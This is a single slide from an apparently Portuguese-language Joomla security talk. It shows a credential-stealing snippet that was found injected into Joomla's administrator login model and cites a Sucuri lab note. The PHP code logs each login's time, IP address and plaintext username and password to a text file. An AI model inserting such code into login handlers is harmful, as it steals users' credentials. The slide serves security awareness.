Slide 20
Slide 20 text
Ameaças / Vulnerabilidades
Recentes
Joomla Password Stealer
Arquivo infectado:
/administrator/components/com_login/models/login.php
$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR]
[$credentials[username]:$credentials[password]]\n");
fclose($fh);
#JDBR14 :: @brunoborgessec
http://labs.sucuri.net/?note=2013-11-21